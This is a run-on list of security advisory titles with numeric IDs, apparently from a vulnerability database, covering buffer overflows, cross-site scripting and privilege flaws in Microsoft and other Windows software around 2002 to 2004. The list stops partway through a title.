URL Validation Error May Let Remote Users Execute Arbitrary Code If User Interactions Occur [1010092] Microsoft Internet Explorer 'file://' URL Processing Flaw Lets Remote Users Damage the Registry [1010079] Microsoft IIS ASP Script Cookie Processing Flaw May Disclose Application Information to Remote Users [1010009] Microsoft Internet Explorer SSL Icon Error May Let Remote Users Impersonate Secure Web Sites [1009939] Microsoft Internet Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009778] Microsoft H.323 Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009777] Microsoft SSL Library Input Validation Error Lets Remote Users Crash the Service [1009769] Microsoft Utility Manager Lets Local Users Run Applications With Elevated Privileges [1009768] Microsoft Winlogon Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code [1009760] Microsoft Virtual DOS Machine (VDM) Lets Local Users Gain Elevated Privileges [1009757] Microsoft Jet Database Engine 'msjet40.dll' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009754] Microsoft ASN.1 Library (msasn1.dll) Double-Free Memory Allocation Error May Let Remote Users Execute Arbitrary Code [1009753] Microsoft SSL Library PCT Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009752] Microsoft Help and Support Center Input Validation Flaw Lets Remote Users Execute Arbitrary Code in the My Computer Zone [1009751] Microsoft LSASS Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1009746] Microsoft Internet Explorer Bitmap Memory Allocation Error Lets Remote Users Cause All Available Memory to Be Consumed [1009743] Microsoft Outlook Express Can Be Crashed By Remote Users With Specially Crafted EML File [1009739] Microsoft Internet Explorer Javascript OLE Object Lets Remote Users Automatically Print Without Authorization [1009690] Microsoft Internet Explorer Security Domain Flaw in Accessing CHM Files Lets Remote Users Execute Arbitrary Code [1009666] Microsoft SharePoint Portal Server Input Validation Holes Permit Cross-Site Scripting Attacks [1009604] Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data [1009603] Microsoft Outlook Express Does Not Correctly Display Links With Embedded FORM Data [1009546] Microsoft Operating Systems Have Unspecified Flaw That Yields Kernel Level Access to Local Users [1009361] Microsoft Internet Explorer Cookie Path Restrictions Can Be Bypassed By Remote Servers [1009360] Microsoft MSN Messenger May Disclose Known Files to Remote Users [1009358] Microsoft Office XP 'mailto' URL Parsing Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Domain [1009357] Microsoft Outlook 'mailto' URL Parsing Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Domain [1009243] Microsoft Internet Explorer (IE) May Leak Keystrokes Across Frames [1009128] Windows XP Kernel NtSystemDebugControl() Flaws Let Local Users With SeDebugPrivilege Execute Arbitrary Code in Kernel Mode [1009067] Microsoft Internet Explorer Integer Overflow in Processing Bitmap Files Lets Remote Users Execute Arbitrary Code [1009009] Microsoft Virtual PC for Mac Temporary File Flaw Lets Local Users Gain Root Privileges [1009007] Microsoft ASN.1 Library Heap Overflows Let Remote Users Execute Arbitrary Code With SYSTEM Privileges [1008901] Microsoft Internet Explorer Travel Log Input Validation Flaw Lets Remote Users Run Arbitrary Scripting Code in the Local Computer Domain [1008843] Windows XP Explorer Executes Arbitrary Code in Folders [1008698] Microsoft Internet Security and Acceleration Server H.323 Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008658] Windows Ftp Server Format String Flaw May Let Remote Users Execute Arbitrary Code [1008586] Microsoft Office Security Features Can Be Bypassed [1008585] GoodTech Systems Telnet Server for Windows NT/2000/XP Can Be Crashed By Remote Users [1008583] Microsoft Internet Explorer Flaw in Processing '.lnk' Shortcuts Lets Remote Users Execute Arbitrary Code [1008578] Microsoft Internet Explorer showHelp() '\..\' Directory Traversal Flaw Lets Remote Users Execute Files on the Target System [1008570] Jordan Stojanovski Windows Telnet Server 'username' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008563] Microsoft IIS Fails to Log HTTP TRACK Requests [1008558] Microsoft Internet Explorer Trusted Domain Default Settings Facilitate Silent Installation of Executables [1008554] Microsoft IE for Mac May Disclose Sensitive Information in Secure URLs to Remote Sites via HTTP Referer Field [1008510] Openwares.org 'Microsoft IE Security Patch' URL Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008428] Microsoft ASP.NET Web Services XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests [1008425] Microsoft IE Does Not Properly Display Some URLs [1008293] Microsoft Internet Explorer Invalid ContentType May Disclose Cache Directory Location to Remote Users [1008292] Microsoft Internet Explorer MHT Redirect Flaws Let Remote Users Execute Arbitrary Code [1008245] Microsoft SharePoint May Let Remote Users Access Protected Pages Without Authenticating [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1008151] Microsoft Works Macro Name Length Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008150] Microsoft Word Macro Name Length Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008149] Microsoft Excel Macro Security Flaw Lets Remote Users Execute Arbitrary Macro Codes [1008148] Microsoft SharePoint Team Services Buffer Overflow May Let Remote Users Execute Arbitrary Code [1008147] Microsoft FrontPage Server Extensions Buffer Overflow May Let Remote Users Execute Arbitrary Code [1008053] Microsoft Internet Explorer IFRAME Refresh Lets Remote HTML Access Local Files [1008000] Microsoft Internet Explorer Lets Remote Users Execute Arbitrary Files in the Local Zone Using a Specially Crafted IFRAME/Location Header [1007937] Microsoft Exchange Server Buffer Overflow in Processing Extended Verb Requests May Let Remote Users Execute Arbitrary Code [1007936] Microsoft Outlook Web Access Input Validation Flaw in 'Compose New Message' Permits Remote Cross-Site Scripting Attacks [1007935] Microsoft ListBox and ComboBox 'user32.dll' Buffer Overflow May Allow Local Users to Gain Elevated Privileges [1007934] Microsoft Help and Support Center HCP Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code With Local Computer Privileges [1007931] Microsoft Authenticode Low Memory Flaw May Let Remote Users Execute Arbitrary Code [1007750] Microsoft BizTalk Server Default Directory Permissions May Let Remote Users Deny Service [1007689] Microsoft Internet Explorer Media Sidebar Flaw Lets Remote Users Execute Arbitrary Code on the System [1007687] Microsoft Internet Explorer Various Cross-Domain Flaws Permit Remote Scripting in Arbitrary Domains [1007618] Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution [1007617] Microsoft Converter for WordPerfect Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1007616] Microsoft Word Document Validation Error Lets Macros Run Without Warning [1007614] Microsoft Access Snapshot Viewer ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007599] Microsoft Outlook May Fail to Delete Outlook Data From the PST File [1007538] Microsoft Internet Explorer Buffer Overflow in CR549.DLL ActiveX Control Permits Remote Code Execution [1007537] Microsoft Internet Explorer Object Tag Flaw Lets Remote Users Execute Arbitrary Code [1007536] Microsoft Internet Explorer Cache Script Flaw Lets Remote Users Execute Code in the My Computer Zone [1007535] Microsoft MDAC Database Component Lets Remote Users Execute Arbitrary Code [1007507] RSA SecurID Interaction With Microsoft URLScan May Disclose URLScan Configuration to Remote Users [1007493] Microsoft Visual Studio Buffer Overflow in 'mciwndx.ocx' May Let Remote Users Execute Arbitrary Code [1007388] Microsoft WebServer Beta for Pocket PC Yields Administrative Access to Remote Users [1007306] Microsoft Outlook Express Again Executes Scripting Code in Plain Text E-mail Messages [1007287] Windows Media Player Again Lets Remote Users Install and Execute Code [1007280] Microsoft Data/Desktop Engine Named Pipe and LPC Flaws Let Local Users Execute Arbitrary Code [1007279] Microsoft SQL Server Named Pipe and LPC Flaws Let Local Users Execute Arbitrary Code [1007278] Microsoft DirectX Heap Overflow in Loading MIDI Files Lets Remote Users Execute Arbitrary Code [1007265] Microsoft MDAC ODBC Component May Store Database Passwords in Plaintext in the Registry [1007262] Microsoft IIS 6.0 Vulnerabilities Permit Cross-Site Scripting and Password Changing Attacks Against Administrators [1007238] Microsoft Outlook Web Access Can Be Crashed By Remote Authenticated Users With an Outlook 2003 Client [1007206] Microsoft SMTP Service Can Be Crashed By Remote Users Sending Mail With an Invalid FILETIME Header [1007205] Microsoft Exchange Server Can Be Crashed By Remote Users Sending Mail With an Invalid FILETIME Header [1007190] Microsoft Internet Explorer 'Chromeless' Window May Let Remote Users Spoof Various User Interface Characteristics [1007189] WebShield SMTP for Windows NT Lets Remote Users Send Executables Through the Filter [1007172] Microsoft Jet Database Engine Buffer Overflow May Let Remote Users Execute Arbitrary Code [1007154] Microsoft SMB Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1007133] Microsoft Outlook Web Access (OWA) May Disclose The User's OWA Password to Remote Users [1007126] Microsoft Internet Explorer Can By Crashed By Loading 'C:\aux' URL [1007098] Microsoft Commerce Server Discloses SQL Server Password to Local Users [1007094] Microsoft NetMeeting Directory Traversal Flaw Lets Remote Users Execute Arbitrary Code [1007072] Microsoft Internet Explorer Buffer Overflow in Processing Scripted 'HR' Tags Lets Remote Users Execute Arbitrary Code [1007070] Symantec Norton Anti-Virus Protection Fails to Detect Viruses on Floppy Diskettes Windows-XP [1007022] SurfControl for Microsoft ISA Server Discloses Files to Remote Users [1007008] Microsoft Internet Explorer XML Parsing Error Lets Remote Users Conduct Cross-Site Scripting Attacks [1007007] Microsoft Internet Explorer Custom HTTP Error Pages May Let Remote Users Execute Scripts in the Local Computer Zone [1006924] Microsoft Internet Explorer Input Validation Flaw in Displaying FTP Site Names Lets Remote Users Execute Arbitrary Scripting Code in Arbitrary Domains [1006918] Microsoft Internet Explorer (IE) Object Tag Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006901] Microsoft UrlScan Default Configuration Displays Identifying Characteristics to Remote Users [1006867] Microsoft IIS Buffer Overflow Lets Remote Users With Upload Privileges Execute Code - Remote Users Can Also Crash the Service [1006844] Microsoft Internet Connection Firewall Fails to Block IP Version 6 Protocol [1006809] Microsoft Outlook Express Lets Remote Users Silently Install Arbitrary Code Using Audio and Media Files [1006808] Microsoft Outlook Express May Be Affected by W32/Palyh@MM Mass-Mailing Worm [1006807] Microsoft Outlook May Be Affected by W32/Palyh@MM Mass-Mailing Worm [1006789] Microsoft ISA Server Input Validation Flaw Lets Remote Users Execute Scripting Code in Arbitrary Security Domains [1006774] Microsoft Internet Explorer May Execute Arbitrary Code in the Wrong Security Domain When Processing Large Numbers of Download Requests [1006771] Microsoft Outlook Express Integer Overflow Lets Remote IMAP Servers Cause the Client to Crash [1006748] Microsoft Outlook Express May Be Affected by W32.Fizzer.A@mm Mass-Mailing Worm [1006747] Microsoft Outlook May Be Affected by W32.Fizzer.A@mm Mass-Mailing Worm [1006728] Microsoft .NET Passport Passwords, Including Hotmail Passwords, Can Be Changed By Remote Users [1006718] Windows Media Player Skin File Processing Lets Remote Users Write Arbitrary Files to Arbitrary Locations [1006704] Microsoft IIS Authentication Manager Discloses Validity of User Names to Remote Users [1006696] Microsoft Internet Explorer Web Folder Access Flaw Lets Remote Users Execute Arbitrary Scripting Code in the My Computer Zone [1006691] Microsoft MN-500 Wireless Base Station Backup Configuration File Discloses Administrator Password [1006686] Microsoft BizTalk Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006634] Microsoft Internet Explorer Bugs (URLMON.DLL Buffer Overflow, File Upload Control Bypass, Plug-in URL Input Validation Flaw, CSS Modal Dialog Input Validation Flaw) Let Remote Users Execute Arbitrary Code or Access Local Files [1006608] Microsoft NTLM Authentication Protocol Flaw Lets Malicious SMB Servers Gain Access to Systems [1006607] Windows XP Service Control Manager Timing Flaw in Service Shutdown May Disclose Sensitive Information to Local Users [1006599] Microsoft REGEDIT.EXE May Let Local Users Gain Elevated Privileges [1006534] Microsoft Proxy Service in Proxy Server 2.0 Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006533] Microsoft Firewall Service in ISA Server Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006361] Microsoft ActiveSync Application Can Be Crashed By Remote Users [1006322] Microsoft ISA Server DNS Intrusion Detection Flaw Lets Remote Users Block DNS Inbound Requests [1006305] Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006280] Protegrity Secure.Data for Microsoft SQL Server 2000 Contains Buffer Oveflows That Let Remote Users Execute Arbitrary Code [1006257] Microsoft Internet Explorer Buffer Overflow in Processing '.MHT' Web Archives Lets Remote Users Execute Arbitrary Code [1006169] Microsoft Internet Explorer Vulnerable Codebase Object Lets Remote Users Execute Arbitrary Code [1006148] Microsoft Outlook Express Security Domain Flaw Lets Remote Users Silently Install and Execute Arbitrary Code [1006046] Microsoft Internet Explorer showHelp() Domain Security Flaw Lets Remote Users Execute Commands [1006036] Microsoft Internet Explorer May Let Remote Users Read or Write Files Via the dragDrop() Method [1005966] Microsoft Outlook May Fail to Encrypt User E-mail, Disclosing the Contents to Remote Users [1005964] Microsoft Locator Service Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Level Privileges [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1005857] Microsoft Internet Explorer Bug in Loading Multimedia Files May Let Remote Users Execute Arbitrary Scripting Code in Other Domains [1005796] Microsoft SMB Signing Flaw May Let Remote Users With Access to an SMB Session Gain Control of a Network Client [1005757] Microsoft Outlook Bug in Processing Malformed E-mail Headers Lets Remote Users Crash the Client [1005751] SMB2WWW Web-Based Windows Networking Client Bug Lets Remote Users Execute Arbitrary Programs [1005747] Microsoft Internet Explorer showModalDialog() Input Validation Flaw Lets Remote Users Execute Arbitary Scripting Code in Any Security Zone [1005723] OpenWindows mailtool(1) Client for Sun Solaris Can Be Crashed By Remote Users [1005699] Microsoft Internet Explorer (IE) Java Class Loader Security Flaw Lets Remote Users Bypass Java Security Restrictions [1005698] Microsoft Java Virtual Machine (VM) Class Loader Security Flaw Lets Remote Users Bypass Java Security Restrictions [1005674] Microsoft Internet Explorer Buffer Overflow in Processing PNG Images Allows Denial of Service Attacks [1005672] Microsoft Internet Explorer MDAC Component Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1005671] Microsoft Data Access Components (MDAC) Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1005505] Microsoft Internet Information Server (IIS) Script Access Control Bug May Let Remote Authenticated Users Upload Unauthorized Executable Files [1005504] Microsoft Internet Information Server (IIS) WebDAV Memory Allocation Flaw Lets Remote Users Crash the Server [1005503] Microsoft Internet Information Server (IIS) Administrative Pages Allow Cross-Site Scripting Attacks [1005502] Microsoft Internet Information Server (IIS) Out-of-Process Access Control Bug Lets Certain Authenticated Users Gain Full Control of the Server [1005489] Microsoft Outlook Express May Fail to Delete E-mail Messages from Local Storage [1005466] Microsoft Internet Explorer Cached Object Flaw Lets Remote Users Execute Arbitrary Programs on the Target User's Computer [1005436] Microsoft Data Engine/Desktop Engine (MSDE) Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005435] Microsoft SQL Server Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005416] Microsoft Internet Explorer Flaw in WebBrowser Control Document Property Lets Remote Users Run Code in the My Computer Security Zone [1005405] Microsoft Outlook Express Buffer Overflow in Parsing S/MIME Messages Lets Remote Users Execute Arbitrary Code [1005395] Microsoft Content Management Server Input Validation Bug in 'ManualLogin.asp' Allows Cross-Site Scripting Attacks [1005377] Microsoft MSN Hotmail/Passport Login Page May Permit Cookie Stealing Via Cross-Site Scripting Attacks [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT [1005339] Microsoft Services for Unix Interix SDK Bugs May Allow Denial of Service Conditions or May Execute Arbitrary Code [1005338] Microsoft Data/Desktop Engine (MSDE) Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005337] Microsoft SQL Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005296] Microsoft PPTP Service Buffer Overflow May Let Remote Users Execute Arbitrary Code [1005287] Microsoft FrontPage Server Extensions SmartHTML Interpreter Bugs May Let Remote Users Execute Arbitrary Code with System Privileges [1005254] Microsoft NT, 2000, and XP Operating Systems May Execute a 16-bit Application Even When The File Has No Execute Permissions [1005246] Microsoft Remote Desktop Protocol (RDP) Design Flaw May Disclose Information About the Unencrypted Data to Remote Users and May Let Data Be Modified During Transmission [1005243] Microsoft NetMeeting Remote Desktop Sharing Screen Saver Access Control Flaw Lets Physically Local Users Hijack Remote Sessions [1005223] (Microsoft Responds) Microsoft Word Document Processing File Include Bug May Let Remote Users Obtain Files From a Target User's System [1005210] Apple QuickTime Media Player Buffer Overflow Lets Remote Users Execute Arbitrary Code on Windows Systems [1005207] Microsoft Outlook Express Can Be Crashed By Remote Users Sending HTML Mail With Long Links Embedded [1005203] Microsoft Internet Explorer Frame Domain Security Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Zone Via Frame URLs [1005200] Microsoft Internet Explorer Implementation Bugs in Java Native Methods May Let Remote Users Execute Arbitrary Code Via Malicious Applets [1005182] Microsoft Internet Explorer URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain [1005177] Microsoft Visual FoxPro Filename Processing Bug Lets Remote Users Create HTML That Will Cause Arbitrary Code to Be Executed When the HTML is Loaded [1005128] Microsoft Internet Explorer XML Script Element Redirect Bug Lets Remote Users View XML Files on the Target User's Computer [1005127] Microsoft Visual Studio .NET Web Projects May Disclose the Web Directory Structure to Remote Users [1005123] Microsoft Internet Explorer Buffer Overflow in Unspecified Text Formatting ActiveX Control Lets Remote Users Execute Arbitrary Code [1005120] Microsoft Terminal Services Advanced Client (TSAC) ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005119] Microsoft Operating System SMB Protocol Implementation in the Network [1005112] Microsoft File Transfer Manager ActiveX Control Buffer Overflow May Let Remote Users Execute Arbitrary Code [1005083] Microsoft Internet Information Server (IIS) Web Server Fails to Properly Validate Client-side Certificates, Allowing Remote Users to Impersonate Other Users or Certificate Issuers [1005075] Microsoft Internet Explorer XMLDSO Java Class Lets Remote HTML Code Access Local Files [1005071] Microsoft DirectX Files Viewer ActiveX Control Has Buffer Overflow That Allows Remote Users to Execute Arbitrary Code [1005067] Microsoft Desktop Engine (MSDE) Extended Stored Procedures May Let Local Users Execute Commands With Database Administrator Privileges [1005066] Microsoft SQL Server Extended Stored Procedures May Let Local Users Execute Commands With Database Administrator Privileges [1005065] Microsoft Network Connection Manager Could Give a Local User System Level Privileges [1004997] Citrix MetaFrame Running on Windows NT4 Terminal Server Can Be Crashed By a Remote User via the Java ICA Web Terminal Interface [1004986] Microsoft Content Management Server Buffer Overflow in Authentication Function May Allow Remote Users to Execute Arbitrary Code With System Level Privileges [1004983] Microsoft Visual C++ Flaw in calloc() and Similar Functions May Result in Buffer Overflows in Applications That Use the Compiler or Runtime Library [1004965] Microsoft Internet Explorer SSL Implementation Flaw in Following Certificate Chains Allows Remote Users to Conduct Man-in-the-Middle Attacks to Obtain Unencrypted Data from the Browser [1004937] Windows 2000 Operating System Default Permissions for the System Partition Lets Local Users Bypass Individual File Permissions and Replace Key System Files [1004927] Microsoft Terminal Services Can Be Crashed By Remote Users Conducting a TCP SYN Scan in Certain Situations [1004917] Microsoft SQL Server MDAC Function Buffer Overflow May Let Remote Users Execute Arbitrary Code to Gain Full Control Over the Database [1004877] Microsoft Internet Explorer (IE) Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network [1004862] Microsoft Outlook Express Flaw in Parsing XML Using Internet Explorer Allows a Remote User to Silently Deliver and Install an Executable on a Target User's Computer [1004831] Microsoft Data Engine (MSDE) Buffer Overflow in Database Consistency Checker May Let Remote Authenticated Users Execute Arbitrary Code with the Privileges of the Database Service [1004830] Microsoft SQL Server Buffer Overflow in Database Consistency Checker May Let Remote Authenticated Users Execute Arbitrary Code with the Privileges of the Database Service [1004829] Microsoft SQL Server Resolution Service Buffer Overflows Let Remote Users Execute Arbitrary Code with the Privileges of the SQL Service [1004828] Microsoft Exchange Server Buffer Overflow in Processing SMTP EHLO Command Lets Remote Users Execute Arbitrary Code on the Server with System Level Privileges [1004827] Microsoft Metadirectory Services Authentication Flaw May Let Remote Users Modify Data and Obtain Elevated Privileges on the System [1004805] Microsoft Outlook Express (and Possibly Outlook) Has File Attachment Name Bugs That Let Remote Users Send Malicious Mail to Bypass Attachment Type Filters and Modify the Apparent File Name and File Size [1004761] Microsoft Foundation Classes (MFC) Information Server Application Programming Interface (ISAPI) 'mfc42.dll' Contains Buffer Overflows That Can Crash the System or Possibly Allow for the Remote Execution of Arbitrary Code [1004757] Microsoft IIS SMTP Service Encapsulation Bug Lets Remote Users Relay Mail and Send SPAM Via the Service [1004746] Microsoft Internet Explorer Flaw in OBJECT Domain Security Enforcement Lets Remote Users Execute Code in Arbitrary Domains [1004744] Microsoft SQL Server Install Process May Disclose Sensitive Passwords to Local Users [1004739] Microsoft SQL Server Desktop Engine (MSDE) Buffer Overflow and Access Control Bug May Let Remote Authorized Users Execute Code with Elevated Privileges, Possibly Including Local System Privileges [1004738] Microsoft SQL Server Buffer Overflow and Access Control Bug May Let Remote Authorized Users Execute Code with Elevated Privileges, Possibly Including Local System Privileges [1004713] Worldspan for Windows Gateway Software Can Be Crashed By Remote Users Sending Malformed Packets [1004686] APC PowerChute Plus for Windows Default Configuration Creates a Shared Folder with World Writeable Permissions [1004646] ColdFusion MX Buffer Overflow When Used With Microsoft Internet Information Server (IIS) Lets Remote Users Crash the IIS Web Server or Execute Arbitrary Code [1004638] Windows Media Player May Let Remote Users Execute Code on a Target User's Computer or Let Local Users Gain Elevated Privileges [1004637] Microsoft Commerce Server Buffer Overflows and Other Flaws Let Remote Users Execute Arbitrary Code with LocalSystem Privileges [1004618] Microsoft Internet Explorer Can Be Crashed By Malicious AVI Object in HTML [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads [1004595] Microsoft Word Documents May Execute Remotely Supplied Macro Code Under Certain Conditions [1004594] Microsoft Excel Spreadsheet May Execute Remotely Supplied Macro Code Within Malicious Documents [1004587] Microsoft SQL Server 2000 Buffer Overflow in OpenDataSource() Function May Let Remote Users Gain SYSTEM Privileges on the Server [1004569] Microsoft Visual Studio .NET Korean Language Version Contains Nimda Virus [1004544] Microsoft SQL Server Buffer Overflow in 'pwdencrypt()' Function May Let Remote Authorized Users Execute Arbitrary Code [1004542] Lumigent Log Explorer Buffer Overflow May Let Remote Users Crash the Microsoft SQL Server Service or Execute Arbitrary Code on the System [1004541] Compaq Insight Manager May Include a Vulnerable Default Configuration of Microsoft MSDE/SQL Server That Allows Remote Users to Execute Commands on the System [1004529] Microsoft Remote Access Service (RAS) Phonebook Buffer Overflow May Let Local Users Execute Arbitrary Code with Local System Privileges [1004528] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains an Input Validation Flaw in an XML SQL Tag That Allows Cross-Site Scripting Attacks [1004527] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains a Buffer Overflow That Lets Remote Users Take Full Control of the System [1004526] Microsoft Internet Information Server (IIS) Heap Overflow in HTR ISAPI Extension While Processing Chunked Encoded Data Lets Remote Users Execute Arbitrary Code [1004518] Microsoft Proxy Server Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Server to Gain Full Control of the Server [1004517] Microsoft Internet Security and Acceleration Server (ISA) Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Server to Gain Full Control of the Server [1004486] Microsoft ASP.NET Buffer Overflow in Processing Cookies in StateServer Mode May Let Remote Users Crash the Service or Execute Arbitrary Code on the Server [1004479] Microsoft Internet Explorer May Execute Remotely Supplied Scripting in the My Computer Zone if FTP Folder Viewing is Enabled [1004464] Microsoft Internet Explorer Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Victim's Computer [1004436] Microsoft Internet Explorer Allows HTML-Delivered Compiled Help Files to Be Automatically Executed on the Target User's Computer [1004407] Microsoft Exchange 2000 Flaw in Processing a Certain Malformed SMTP Command Allows Remote Users to Deny Service to the Server [1004372] Microsoft Excel Spreadsheet XML Stylesheet ActiveX Object Flaw Lets Remote Users Create Malicious Excel Spreadsheets That May Execute Arbitrary Code When Opened With the XML Stylesheet Option [1004369] Microsoft Active Directory May Have Bug That Allows Remote Users to Crash the Directory [1004361] Microsoft Date Engine (MSDE) Default Configuration Leaves Blank Password for System Administrator Account [1004360] Opty-Way Enterprise Glassworks Management Application Installs Microsoft Data Engine Insecurely, Allowing Remote Users to Execute Commands on the System [1004350] Deerfield WebSite Pro Windows-based Web Server May Disclose CGI Source Code to Remote Users in Certain Cases [1004304] Microsoft Internet Explorer (IE) New Content-Disposition Bugs May Let Remote Users Execute Arbitrary Code on the Victim's Computer [1004300] Microsoft Internet Explorer (IE) Zone Spoofing Hole Lets Remote Users Create HTML That, When Loaded, May Run in a Less-Secure IE Security Zone [1004290] Microsoft Internet Explorer Bugs in 'BGSOUND' and 'IFRAME' Tags Let Remote Users Create HTML That Will Cause Denial of Service Conditions or Will Access Special DOS Devices [1004259] Network Associates PGP 'Wipe Deleted Files' Option Fails to Wipe Clear Text Temporary Files Used by the Windows 2000 Encrypted File System Feature [1004251] Microsoft Exchange Instant Messenger ActiveX Control Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004250] Microsoft MSN Messenger Includes an ActiveX Control That Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004249] Microsoft MSN Chat Control ActiveX Control Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004229] Microsoft Office 'Word Mail Merge' Feature Allows Remote Users to Cause Arbitrary Programs to Be Executed on the Target User's Computer [1004226] Microsoft MSN Messenger Instant Messaging Client Malformed Header Processing Flaw Lets Remote Users Crash the Client [1004197] Microsoft Internet Explorer Can Be Crashed By Incorrectly Sized XBM Graphics Files [1004157] Microsoft Outlook Weak Security Enforcement When Editing Messages with Microsoft Word Lets Remote Users Send Malicious Code to Outlook Recipients That Will Be Executed When Forwarded or Replied To [1004146] Microsoft Internet Explorer Browser Can Be Crashed By Remote HTML Containing Malicious Image Tags That Cause Infinite Processing Loops [1004130] Microsoft MSN Messenger Instant Messaging Client Discloses Buddy List to Local Users [1004121] Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users With OLE OBJECT Element Dependency Loops [1004109] Microsoft Distributed Transaction Coordinator Can Be Crashed By Remote Users Sending Malformed Packets [1004090] Microsoft Back Office Web Administration Authentication Mechanism Can Be Bypassed By Remote Users [1004079] Microsoft Internet Explorer (IE) 'dialogArguments' Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against IE Users [1004051] Microsoft Outlook Express for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004050] Microsoft Office for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004049] Microsoft Internet Explorer for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004048] Microsoft Word Object Creation Flaw Lets Remote Users Create ActiveX That Will Consume Memory on the Victim's Computer [1004044] Cisco CallManager Affected by Microsoft Internet Information Server (IIS) Bugs [1004032] Microsoft Internet Information Server (IIS) FTP STAT Command Bug Lets Remote Users Crash Both the FTP and the Web Services [1004031] Microsoft Internet Information Server (IIS) URL Length Bug Lets Remote Users Crash the Web Service [1004014] Microsoft Internet Information Server ASP HTTP Header Processing Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server [1004011] Microsoft Internet Information Server (IIS) Buffer Overflow in ASP Server-Side Include Function May Let Remote Users Execute Arbitrary Code on the Web Server [1004008] Microsoft Internet Information Server Comes With Code That Allows Remote Users to Conduct Cross-Site Scripting Attacks [1004006] Microsoft Internet Information Server (IIS) Off-By-One Heap Overflow in .HTR Processing May Let Remote Users Execute Arbitrary Code on the Server [1004005] Microsoft Internet Information Server Buffer Overflow in Chunked Encoding Mechanism Lets Remote Users Run Arbitrary Code on the Server [1004002] Microsoft Office Web Components Let Remote Users Determine if Specified Files Exist on Another User's Host [1004001] Microsoft Office Web Components Let Remote Users Gain Full Read and Write Control Over Another User's Clipboard, Even if Clipboard Access Via Scripts is Disabled [1004000] Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files [1003999] Microsoft Office Web Components in Office XP Lets Remote Users Cause Malicious Scripting to Be Executed By Another User's Browser Even If Scripting is Disabled [1003948] Microsoft Internet Explorer Cascading Style Sheets (CSS) Invalid Attribute Bug Lets Remote Users Read Portions of Files on the Victim's Computer [1003932] Microsoft Office XP Active Content Bug Lets Remote Users Cause Code to Be Executed on an Office User's Computer [1003922] Microsoft Outlook Web Access With SecurID Authentication May Allow Remote Users to Avoid the SecurID Authentication in Certain Cases [1003915] Microsoft Internet Explorer Browser Security Zone Flaw Lets Remote Users Cause Cookie-based Scripts to Be Executed on Another User's Browser in the Incorrect Security Domain [1003907] Microsoft Internet Explorer Discloses The Existence of and Details of Local Files to Remote Users [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System [1003871] Microsoft .NET Unspecified Vulnerabilities May Allow a Remote User to Cause Arbitrary Code to Be Executed on Another User's Systems [1003856] Microsoft Internet Explorer Can Be Crashed By Malicious 'location.replace' Javascript [1003839] Microsoft Internet Explorer (IE) 6 Lets Remote Users Cause Files to Be Downloaded and Executed Without the Knowledge or Consent of the Victim [1003830] Windows NT and 2000 Session Manager Debug Hole Lets Local Users Obtain Handles to Any Process or Thread to Obtain Elevated Privileges on the System [1003800] A Multitude of Microsoft SQL Server Extended 